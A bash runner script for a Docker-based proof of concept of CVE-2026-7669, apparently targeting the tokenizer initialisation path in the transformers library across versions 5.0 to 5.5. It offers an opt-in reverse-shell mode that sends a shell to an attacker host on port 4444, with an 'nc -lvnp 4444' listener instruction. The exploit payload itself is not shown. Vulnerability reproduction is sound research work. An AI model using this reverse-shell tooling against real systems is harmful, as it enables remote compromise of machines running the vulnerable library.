#!/usr/bin/env bash # CVE-2026-7669 PoC runner. # # Usage: # ./run.sh Full PoC (preflight + 4 phases + ledger). # ./run.sh --server Reproduce via TokenizerManager init path. # ./run.sh --versions Test transformers 5.0..5.5 matrix. # ./run.sh --revshell HOST Opt-in reverse shell to HOST:4444. # ./run.sh --rebuild Force --no-cache rebuild. # ./run.sh --copy-ledger PATH Run then copy ledger to PATH. set -euo pipefail IMAGE_TAG="cve-2026-7669" SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" cd "$SCRIPT_DIR" if ! command -v docker >/dev/null 2>&1; then echo "ERROR: docker not found in PATH." >&2 exit 127 fi if ! docker info >/dev/null 2>&1; then echo "ERROR: docker daemon not running." >&2 exit 127 fi build_image() { echo "[*] Building $IMAGE_TAG ..." if [[ "${REBUILD:-0}" == "1" ]]; then docker build --no-cache -t "$IMAGE_TAG" . 2>&1 | tail -3 else docker build -t "$IMAGE_TAG" . 2>&1 | tail -3 fi echo } case "${1:-}" in --help|-h) sed -n '2,12p' "$0" exit 0 ;; --rebuild) export REBUILD=1 shift || true build_image docker run --rm "$IMAGE_TAG" ;; --revshell) if [[ -z "${2:-}" ]]; then echo "Usage: ./run.sh --revshell " >&2 exit 1 fi echo "Listener: nc -lvnp 4444 on the attacker host first." build_image docker run --rm -e ATTACKER_HOST="$2" -e ATTACKER_PORT=4444 "$IMAGE_TAG" ;; --server) build_image docker run --rm --entrypoint bash "$IMAGE_TAG" -c \ "python3 setup_model.py && python3 test_server.py" ;; --versions) build_image docker run --rm --entrypoint bash "$IMAGE_TAG" -c \ "python3 setup_model.py && python3 test_versions.py" ;; --copy-ledger) if [[ -z "${2:-}" ]]; then echo "Usage: ./run.sh --copy-ledger " >&2 exit 1 fi out_path="$2" build_image cid="$(docker create "$IMAGE_TAG")" docker start -ai "$cid" || true docker cp "$cid:/tmp/poc_claim_ledger.json" "$out_path" docker rm "$cid" >/dev/null echo "[*] Ledger written to $out_path" ;; "") build_image docker run --rm "$IMAGE_TAG" ;; *) echo "Unknown option: $1" >&2 sed -n '2,12p' "$0" exit 2 ;; esac